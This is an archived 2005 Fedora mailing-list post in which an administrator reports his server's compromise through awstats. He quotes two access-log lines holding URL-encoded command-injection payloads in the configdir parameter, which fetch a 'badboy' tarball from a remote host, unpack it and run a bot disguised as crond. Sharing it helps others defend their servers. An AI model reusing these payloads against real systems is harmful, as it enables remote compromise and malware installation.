[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]

Security Breach

From: Chris Strzelczyk <cstrzelczyk nobletechnology net>
To: For users of Fedora Core releases <fedora-list redhat com>
Subject: Security Breach
Date: Fri, 4 Mar 2005 11:40:18 -0500

Hey guys,

I just though I would let you know how my server got compromised. This even happend after I installed the new version of awstats on Wednesday. So in short I don't know if it is OK to run awstats as a cgi executable.

These are from my access log:

"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"

"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 2500 HTTP/1.1" 200 634 "-" "-"

-cs

Follow-Ups:
- Re: Security Breach
  - From: Alexander Dalloz

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]